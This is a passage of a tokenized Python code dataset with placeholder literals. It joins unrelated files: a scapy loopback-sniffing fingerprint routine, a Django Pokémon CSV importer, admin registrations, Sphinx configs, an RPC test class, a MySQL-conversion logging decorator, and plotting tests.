) <EOL> iface = conf . route . route ( '<STR_LIT:127.0.0.1>' ) [ <NUM_LIT:0> ] <EOL> count = <NUM_LIT> <EOL> pl = sniff ( iface = iface , filter = '<STR_LIT>' + str ( port ) , count = count , timeout = <NUM_LIT:3> ) <EOL> map ( addresult , map ( packet2p0f , pl ) ) <EOL> os . waitpid ( pid , <NUM_LIT:0> ) <EOL> elif pid < <NUM_LIT:0> : <EOL> log_runtime . 
error ( "<STR_LIT>" ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> s1 = socket . socket ( socket . AF_INET , type = socket . SOCK_STREAM ) <EOL> try : <EOL> s1 . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> except socket . error : <EOL> pass <EOL> s1 . bind ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> s1 . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> s1 . close ( ) <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> import csv <EOL> from pokemon . models import * <EOL> def build_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> new_p = Pokemon ( <EOL> pkdx_id = int ( row [ <NUM_LIT:0> ] ) , <EOL> name = str ( row [ <NUM_LIT:1> ] ) , <EOL> exp = int ( row [ <NUM_LIT:5> ] ) , <EOL> catch_rate = <NUM_LIT:0> , <EOL> happiness = <NUM_LIT:0> , <EOL> hp = <NUM_LIT:0> , <EOL> attack = <NUM_LIT:0> , <EOL> defense = <NUM_LIT:0> , <EOL> speed = <NUM_LIT:0> , <EOL> sp_atk = <NUM_LIT:0> , <EOL> sp_def = <NUM_LIT:0> , <EOL> total = <NUM_LIT:0> , <EOL> egg_cycles = <NUM_LIT:0> , <EOL> ) <EOL> new_p . save ( ) <EOL> print '<STR_LIT>' % new_p . name <EOL> def build_abilities ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> new_a = Ability ( <EOL> name = row [ <NUM_LIT:1> ] , <EOL> description = '<STR_LIT>' , <EOL> ) <EOL> new_a . save ( ) <EOL> print '<STR_LIT>' % new_a . name <EOL> def build_moves ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> new_a = Move ( <EOL> name = row [ <NUM_LIT:1> ] , <EOL> description = '<STR_LIT>' , <EOL> ) <EOL> new_a . accuracy = row [ <NUM_LIT:6> ] if row [ <NUM_LIT:6> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> new_a . pp = row [ <NUM_LIT:5> ] if row [ <NUM_LIT:5> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> new_a . power = row [ <NUM_LIT:4> ] if row [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> new_a . save ( ) <EOL> print '<STR_LIT>' % new_a . name <EOL> def build_ability_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . 
reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> poke = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> ab = Ability . objects . get ( pk = int ( row [ <NUM_LIT:1> ] ) ) <EOL> poke . abilities . add ( ab ) <EOL> poke . save ( ) <EOL> print '<STR_LIT>' + ab . name + '<STR_LIT>' + poke . name <EOL> def build_move_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> LEARN = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> poke = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> mv = Move . objects . get ( pk = int ( row [ <NUM_LIT:2> ] ) ) <EOL> pm , created = MovePokemon . objects . get_or_create ( <EOL> pokemon = poke , <EOL> move = mv , <EOL> ) <EOL> if created : <EOL> learn = LEARN [ int ( row [ <NUM_LIT:3> ] ) ] if int ( row [ <NUM_LIT:3> ] ) <= <NUM_LIT:5> else LEARN [ <NUM_LIT:5> ] <EOL> pm . learn_type = learn <EOL> pm . level = row [ <NUM_LIT:4> ] if row [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> pm . save ( ) <EOL> print '<STR_LIT>' + pm . __unicode__ ( ) <EOL> def build_egg_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> poke = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> egg = EggGroup . objects . get ( pk = int ( row [ <NUM_LIT:1> ] ) ) <EOL> poke . egg_group . add ( egg ) <EOL> poke . save ( ) <EOL> def build_type_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . 
reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> poke = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> ty = Type . objects . get ( pk = int ( row [ <NUM_LIT:1> ] ) ) <EOL> poke . types . add ( ty ) <EOL> poke . save ( ) <EOL> print '<STR_LIT>' + ty . name + '<STR_LIT>' + poke . name <EOL> def build_sprites ( ) : <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT> ) : <EOL> str_num = str ( i ) <EOL> sfile = '<STR_LIT>' % str_num <EOL> p = Pokemon . objects . filter ( pkdx_id = i ) <EOL> if p . exists ( ) : <EOL> p = p [ <NUM_LIT:0> ] <EOL> s = Sprite ( <EOL> name = p . name + '<STR_LIT>' , <EOL> image = sfile ) <EOL> s . save ( ) <EOL> print '<STR_LIT>' % p . name <EOL> else : <EOL> print '<STR_LIT>' % i <EOL> def poke_sprite_links ( ) : <EOL> for i in Sprite . objects . all ( ) : <EOL> p = Pokemon . objects . filter ( name = i . name [ : - <NUM_LIT:5> ] ) <EOL> if p . exists ( ) : <EOL> p = p [ <NUM_LIT:0> ] <EOL> p . sprites . add ( i ) <EOL> p . save ( ) <EOL> print '<STR_LIT>' % p . name <EOL> else : <EOL> print '<STR_LIT>' % i . name [ : - <NUM_LIT:5> ] <EOL> def build_poke_stats ( ) : <EOL> """<STR_LIT>""" <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> p = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) <EOL> if p . exists ( ) : <EOL> p = p [ <NUM_LIT:0> ] <EOL> p . height = row [ <NUM_LIT:3> ] if row [ <NUM_LIT:3> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> p . weight = row [ <NUM_LIT:4> ] if row [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> p . happiness = row [ <NUM_LIT:5> ] if row [ <NUM_LIT:5> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> p . save ( ) <EOL> print '<STR_LIT>' % p . name <EOL> file = open ( '<STR_LIT>' ) <EOL> rdr = csv . 
reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> p = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) <EOL> if p . exists ( ) : <EOL> p = p [ <NUM_LIT:0> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:1>' : <EOL> p . hp = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:2>' : <EOL> p . attack = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:3>' : <EOL> p . defense = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:4>' : <EOL> p . sp_atk = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT:5>' : <EOL> p . sp_def = row [ <NUM_LIT:2> ] <EOL> if row [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> p . speed = row [ <NUM_LIT:2> ] <EOL> p . save ( ) <EOL> print '<STR_LIT>' % p . name <EOL> def build_evolutions ( ) : <EOL> """<STR_LIT>""" <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> method = [ '<STR_LIT:U+0020>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> frm = Pokemon . objects . filter ( pkdx_id = int ( row [ <NUM_LIT:1> ] ) - <NUM_LIT:1> ) <EOL> if not frm . exists ( ) : <EOL> frm = Pokemon . objects . filter ( pkdx_id = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> else : <EOL> frm = frm [ <NUM_LIT:0> ] <EOL> to = Pokemon . objects . filter ( pkdx_id = int ( row [ <NUM_LIT:1> ] ) ) <EOL> if not to . exists ( ) : <EOL> to = Pokemon . objects . filter ( pkdx_id = <NUM_LIT:2> ) [ <NUM_LIT:0> ] <EOL> else : <EOL> to = to [ <NUM_LIT:0> ] <EOL> if method [ int ( row [ <NUM_LIT:2> ] ) ] == '<STR_LIT>' : <EOL> e = Evolution ( <EOL> frm = frm , <EOL> to = to , <EOL> method = method [ int ( row [ <NUM_LIT:2> ] ) ] , <EOL> level = row [ <NUM_LIT:4> ] if row [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> ) <EOL> e . save ( ) <EOL> print '<STR_LIT>' % e . 
__unicode__ ( ) <EOL> def build_move_descriptions ( ) : <EOL> """<STR_LIT>""" <EOL> for m in Move . objects . all ( ) : <EOL> f_moves = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> f_descrips = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> for row in csv . reader ( f_moves , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if str ( row [ <NUM_LIT:1> ] ) == m . name : <EOL> for drow in csv . reader ( f_descrips , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if str ( row [ <NUM_LIT:10> ] ) == str ( drow [ <NUM_LIT:0> ] ) : <EOL> s = str ( drow [ <NUM_LIT:3> ] ) . replace ( <EOL> '<STR_LIT>' , str ( row [ <NUM_LIT:11> ] ) ) <EOL> s = s . replace ( '<STR_LIT:[>' , '<STR_LIT>' ) <EOL> s = s . replace ( '<STR_LIT:]>' , '<STR_LIT>' ) <EOL> m . description = s <EOL> m . save ( ) <EOL> print '<STR_LIT>' % m . name <EOL> def build_complex_evolutions ( ) : <EOL> """<STR_LIT>""" <EOL> fspecies = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> fevols = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> method = [ '<STR_LIT:U+0020>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> c = <NUM_LIT:0> <EOL> for row in csv . reader ( fspecies , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' and row [ <NUM_LIT:3> ] != '<STR_LIT>' : <EOL> frm = Pokemon . objects . get ( pkdx_id = int ( row [ <NUM_LIT:3> ] ) ) <EOL> fevols = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> for erow in csv . reader ( fevols , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if erow [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> to = Pokemon . objects . get ( pkdx_id = int ( erow [ <NUM_LIT:1> ] ) ) <EOL> if int ( erow [ <NUM_LIT:1> ] ) == int ( row [ <NUM_LIT:0> ] ) : <EOL> mthd = method [ int ( erow [ <NUM_LIT:2> ] ) ] <EOL> lvl = erow [ <NUM_LIT:4> ] if erow [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> e = Evolution ( frm = frm , to = to , method = mthd , level = lvl ) <EOL> e . save ( ) <EOL> print '<STR_LIT>' % ( frm . name , to . 
name ) <EOL> c += <NUM_LIT:1> <EOL> print '<STR_LIT>' % str ( c ) <EOL> def build_pokedex_descriptions ( ) : <EOL> """<STR_LIT>""" <EOL> gens = { <NUM_LIT:1> : '<STR_LIT:1>' , <NUM_LIT:2> : '<STR_LIT:1>' , <NUM_LIT:3> : '<STR_LIT:1>' , <NUM_LIT:4> : '<STR_LIT:1>' , <NUM_LIT:5> : '<STR_LIT:1>' , <NUM_LIT:6> : '<STR_LIT:1>' , <EOL> <NUM_LIT:7> : '<STR_LIT:2>' , <NUM_LIT:8> : '<STR_LIT:2>' , <NUM_LIT:9> : '<STR_LIT:2>' , <NUM_LIT:10> : '<STR_LIT:3>' , <NUM_LIT:11> : '<STR_LIT:3>' , <NUM_LIT:12> : '<STR_LIT:3>' , <NUM_LIT> : '<STR_LIT:3>' , <EOL> <NUM_LIT> : '<STR_LIT:3>' , <NUM_LIT:15> : '<STR_LIT:4>' , <NUM_LIT:16> : '<STR_LIT:4>' , <NUM_LIT> : '<STR_LIT:4>' , <NUM_LIT> : '<STR_LIT:4>' , <NUM_LIT> : '<STR_LIT:4>' , <NUM_LIT:20> : '<STR_LIT:5>' , <EOL> <NUM_LIT> : '<STR_LIT:5>' , <NUM_LIT> : '<STR_LIT:5>' , <NUM_LIT> : '<STR_LIT>' , <NUM_LIT> : '<STR_LIT>' } <EOL> descrips = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> c = <NUM_LIT:0> <EOL> for row in csv . reader ( descrips , delimiter = '<STR_LIT:U+002C>' ) : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' and int ( row [ <NUM_LIT:2> ] ) == <NUM_LIT:9> : <EOL> p = Pokemon . objects . get ( pkdx_id = int ( row [ <NUM_LIT:0> ] ) ) <EOL> g = Game . objects . get ( pk = row [ <NUM_LIT:1> ] ) <EOL> d , _ = Description . objects . get_or_create ( <EOL> name = p . name + '<STR_LIT>' + gens [ int ( row [ <NUM_LIT:1> ] ) ] , <EOL> description = row [ <NUM_LIT:3> ] ) <EOL> d . game . add ( g ) <EOL> d . save ( ) <EOL> print '<STR_LIT>' % ( d . name , g . name ) <EOL> c += <NUM_LIT:1> <EOL> print '<STR_LIT>' % str ( c ) </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib import admin <EOL> from . models import * <EOL> admin . site . register ( Ability ) <EOL> admin . site . register ( AbilityName ) <EOL> admin . site . register ( AbilityEffectText ) <EOL> admin . site . register ( AbilityFlavorText ) <EOL> admin . site . register ( AbilityChange ) <EOL> admin . site . register ( AbilityChangeEffectText ) <EOL> admin . site . register ( Berry ) <EOL> admin . site . register ( BerryFirmness ) <EOL> admin . site . register ( BerryFirmnessName ) <EOL> admin . site . register ( BerryFlavor ) <EOL> admin . site . register ( Characteristic ) <EOL> admin . site . register ( CharacteristicDescription ) <EOL> admin . site . register ( ContestCombo ) <EOL> admin . site . register ( ContestEffectEffectText ) <EOL> admin . site . register ( ContestEffectFlavorText ) <EOL> admin . site . register ( ContestEffect ) <EOL> admin . site . register ( ContestType ) <EOL> admin . site . register ( ContestTypeName ) <EOL> admin . site . register ( EggGroup ) <EOL> admin . site . register ( EggGroupName ) <EOL> admin . site . register ( EncounterCondition ) <EOL> admin . site . register ( EncounterConditionValue ) <EOL> admin . site . register ( EncounterConditionName ) <EOL> admin . site . register ( EncounterConditionValueName ) <EOL> admin . site . register ( EncounterConditionValueMap ) <EOL> admin . site . register ( EncounterMethod ) <EOL> admin . site . register ( EncounterMethodName ) <EOL> admin . site . register ( EncounterSlot ) <EOL> admin . site . register ( Encounter ) <EOL> admin . site . register ( EvolutionChain ) <EOL> admin . site . register ( EvolutionTrigger ) <EOL> admin . site . register ( EvolutionTriggerName ) <EOL> admin . site . register ( Experience ) <EOL> admin . site . register ( Gender ) <EOL> admin . site . register ( Generation ) <EOL> admin . site . register ( GenerationName ) <EOL> admin . site . register ( GrowthRate ) <EOL> admin . site . 
register ( GrowthRateDescription ) <EOL> admin . site . register ( ItemCategory ) <EOL> admin . site . register ( ItemCategoryName ) <EOL> admin . site . register ( ItemAttribute ) <EOL> admin . site . register ( ItemAttributeMap ) <EOL> admin . site . register ( ItemAttributeDescription ) <EOL> admin . site . register ( ItemFlavorText ) <EOL> admin . site . register ( ItemFlingEffect ) <EOL> admin . site . register ( ItemFlingEffectEffectText ) <EOL> admin . site . register ( ItemGameIndex ) <EOL> admin . site . register ( ItemName ) <EOL> admin . site . register ( ItemPocketName ) <EOL> admin . site . register ( ItemPocket ) <EOL> admin . site . register ( ItemEffectText ) <EOL> admin . site . register ( Item ) <EOL> admin . site . register ( Language ) <EOL> admin . site . register ( LanguageName ) <EOL> admin . site . register ( LocationAreaEncounterRate ) <EOL> admin . site . register ( LocationAreaName ) <EOL> admin . site . register ( LocationArea ) <EOL> admin . site . register ( LocationGameIndex ) <EOL> admin . site . register ( LocationName ) <EOL> admin . site . register ( Location ) <EOL> admin . site . register ( Machine ) <EOL> admin . site . register ( MoveBattleStyle ) <EOL> admin . site . register ( MoveBattleStyleName ) <EOL> admin . site . register ( MoveChange ) <EOL> admin . site . register ( MoveDamageClass ) <EOL> admin . site . register ( MoveDamageClassDescription ) <EOL> admin . site . register ( MoveEffectChange ) <EOL> admin . site . register ( MoveEffectChangeEffectText ) <EOL> admin . site . register ( MoveEffectEffectText ) <EOL> admin . site . register ( MoveEffect ) <EOL> admin . site . register ( MoveAttributeDescription ) <EOL> admin . site . register ( MoveAttributeMap ) <EOL> admin . site . register ( MoveAttributeName ) <EOL> admin . site . register ( MoveAttribute ) <EOL> admin . site . register ( MoveFlavorText ) <EOL> admin . site . register ( MoveLearnMethod ) <EOL> admin . site . 
register ( MoveLearnMethodName ) <EOL> admin . site . register ( MoveMeta ) <EOL> admin . site . register ( MoveMetaAilment ) <EOL> admin . site . register ( MoveMetaAilmentName ) <EOL> admin . site . register ( MoveMetaCategoryDescription ) <EOL> admin . site . register ( MoveMetaCategory ) <EOL> admin . site . register ( MoveMetaStatChange ) <EOL> admin . site . register ( MoveName ) <EOL> admin . site . register ( MoveTargetDescription ) <EOL> admin . site . register ( MoveTarget ) <EOL> admin . site . register ( Move ) <EOL> admin . site . register ( NatureBattleStylePreference ) <EOL> admin . site . register ( NatureName ) <EOL> admin . site . register ( NaturePokeathlonStat ) <EOL> admin . site . register ( Nature ) <EOL> admin . site . register ( PalParkArea ) <EOL> admin . site . register ( PalParkAreaName ) <EOL> admin . site . register ( PalPark ) <EOL> admin . site . register ( PokeathlonStatName ) <EOL> admin . site . register ( PokeathlonStat ) <EOL> admin . site . register ( Pokedex ) <EOL> admin . site . register ( PokedexVersionGroup ) <EOL> admin . site . register ( PokedexDescription ) <EOL> admin . site . register ( Pokemon ) <EOL> admin . site . register ( PokemonAbility ) <EOL> admin . site . register ( PokemonColor ) <EOL> admin . site . register ( PokemonColorName ) <EOL> admin . site . register ( PokemonDexNumber ) <EOL> admin . site . register ( PokemonEggGroup ) <EOL> admin . site . register ( PokemonEvolution ) <EOL> admin . site . register ( PokemonForm ) <EOL> admin . site . register ( PokemonFormName ) <EOL> admin . site . register ( PokemonFormGeneration ) <EOL> admin . site . register ( PokemonGameIndex ) <EOL> admin . site . register ( PokemonHabitat ) <EOL> admin . site . register ( PokemonHabitatName ) <EOL> admin . site . register ( PokemonItem ) <EOL> admin . site . register ( PokemonMove ) <EOL> admin . site . register ( PokemonShape ) <EOL> admin . site . register ( PokemonShapeName ) <EOL> admin . site . 
register ( PokemonSpecies ) <EOL> admin . site . register ( PokemonSpeciesName ) <EOL> admin . site . register ( PokemonSpeciesDescription ) <EOL> admin . site . register ( PokemonSpeciesFlavorText ) <EOL> admin . site . register ( PokemonStat ) <EOL> admin . site . register ( PokemonType ) <EOL> admin . site . register ( Region ) <EOL> admin . site . register ( RegionName ) <EOL> admin . site . register ( StatName ) <EOL> admin . site . register ( Stat ) <EOL> admin . site . register ( SuperContestEffect ) <EOL> admin . site . register ( SuperContestCombo ) <EOL> admin . site . register ( SuperContestEffectFlavorText ) <EOL> admin . site . register ( Type ) <EOL> admin . site . register ( TypeName ) <EOL> admin . site . register ( TypeGameIndex ) <EOL> admin . site . register ( TypeEfficacy ) <EOL> admin . site . register ( Version ) <EOL> admin . site . register ( VersionName ) <EOL> admin . site . register ( VersionGroup ) <EOL> admin . site . register ( VersionGroupMoveLearnMethod ) <EOL> admin . site . register ( VersionGroupRegion ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> from updater4pyi import upd_version <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = upd_version . version_str <EOL> release = version <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> '''<STR_LIT>''' <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> from zero . rpc import ConfiguredRPC <EOL> def _get_test_config ( ) : <EOL> return { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:port>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> } <EOL> class CommonRPC ( ConfiguredRPC ) : <EOL> '<STR_LIT>' <EOL> def ping ( self ) : <EOL> return '<STR_LIT>' <EOL> def echo ( self , msg ) : <EOL> return msg <EOL> def hostname ( self ) : <EOL> from socket import gethostname <EOL> return gethostname ( ) <EOL> def time ( self ) : <EOL> import time <EOL> return time . time ( ) </s>
<s> import sys , os <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> epub_title = u'<STR_LIT>' <EOL> epub_author = u'<STR_LIT>' <EOL> epub_publisher = u'<STR_LIT>' <EOL> epub_copyright = u'<STR_LIT>' </s>
<s> from __future__ import absolute_import <EOL> import sys <EOL> from functools import wraps <EOL> from . mysql_reader import MysqlReader <EOL> try : <EOL> from termcolor import cprint <EOL> except ImportError : <EOL> pass <EOL> def print_row_progress ( val ) : <EOL> try : <EOL> cprint ( '<STR_LIT>' % val , '<STR_LIT>' , end = '<STR_LIT:U+0020>' ) <EOL> except NameError : <EOL> print ( '<STR_LIT>' % val ) , <EOL> sys . stdout . flush ( ) <EOL> def print_start_table ( val ) : <EOL> try : <EOL> cprint ( val , '<STR_LIT>' ) <EOL> except NameError : <EOL> print ( val ) <EOL> def print_table_actions ( val ) : <EOL> try : <EOL> cprint ( '<STR_LIT>' % val , '<STR_LIT>' ) <EOL> except NameError : <EOL> print ( '<STR_LIT>' % val ) <EOL> def find_first ( items , func ) : <EOL> return next ( ( item for item in items if func ( item ) ) , None ) <EOL> def print_red ( val ) : <EOL> try : <EOL> cprint ( val , '<STR_LIT>' ) <EOL> except NameError : <EOL> print ( val ) <EOL> def status_logger ( f ) : <EOL> start_template = '<STR_LIT>' <EOL> finish_template = '<STR_LIT>' <EOL> truncate_template = '<STR_LIT>' <EOL> create_template = '<STR_LIT>' <EOL> constraints_template = '<STR_LIT>' <EOL> write_contents_template = '<STR_LIT>' <EOL> index_template = '<STR_LIT>' <EOL> trigger_template = '<STR_LIT>' <EOL> statuses = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % truncate_template , <EOL> '<STR_LIT>' : finish_template % truncate_template <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % create_template , <EOL> '<STR_LIT>' : finish_template % create_template , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % constraints_template , <EOL> '<STR_LIT>' : finish_template % constraints_template , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % write_contents_template , <EOL> '<STR_LIT>' : finish_template % write_contents_template , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : 
start_template % index_template , <EOL> '<STR_LIT>' : finish_template % index_template , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : start_template % trigger_template , <EOL> '<STR_LIT>' : finish_template % trigger_template , <EOL> } , <EOL> } <EOL> @ wraps ( f ) <EOL> def decorated_function ( * args , ** kwargs ) : <EOL> if getattr ( args [ <NUM_LIT:0> ] , '<STR_LIT>' , False ) : <EOL> if '<STR_LIT>' in kwargs : <EOL> table = kwargs [ '<STR_LIT>' ] <EOL> else : <EOL> table = find_first ( list ( args ) + kwargs . values ( ) , lambda c : c . __class__ is MysqlReader . Table ) <EOL> assert table <EOL> print_table_actions ( statuses [ f . func_name ] [ '<STR_LIT:start>' ] % table . name ) <EOL> ret = f ( * args , ** kwargs ) <EOL> print_table_actions ( statuses [ f . func_name ] [ '<STR_LIT>' ] % table . name ) <EOL> return ret <EOL> else : <EOL> return f ( * args , ** kwargs ) <EOL> return decorated_function </s>
<s> import numpy as np <EOL> import matplotlib as mpl <EOL> from matplotlib import pyplot as plt <EOL> import lineid_plot <EOL> def test_unique_labels ( ) : <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> x = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> assert lineid_plot . unique_labels ( line_label1 ) == x <EOL> def test_minimal_plot ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = <NUM_LIT> ) <EOL> line_wave = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> line_label1 = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> lineid_plot . plot_line_ids ( wave , flux , line_wave , line_label1 ) <EOL> def test_no_line_from_annotation_to_flux ( ) : <EOL> wave = <NUM_LIT> + np . arange ( <NUM_LIT> ) * <NUM_LIT:0.1> <EOL> flux = np . random . normal ( size = 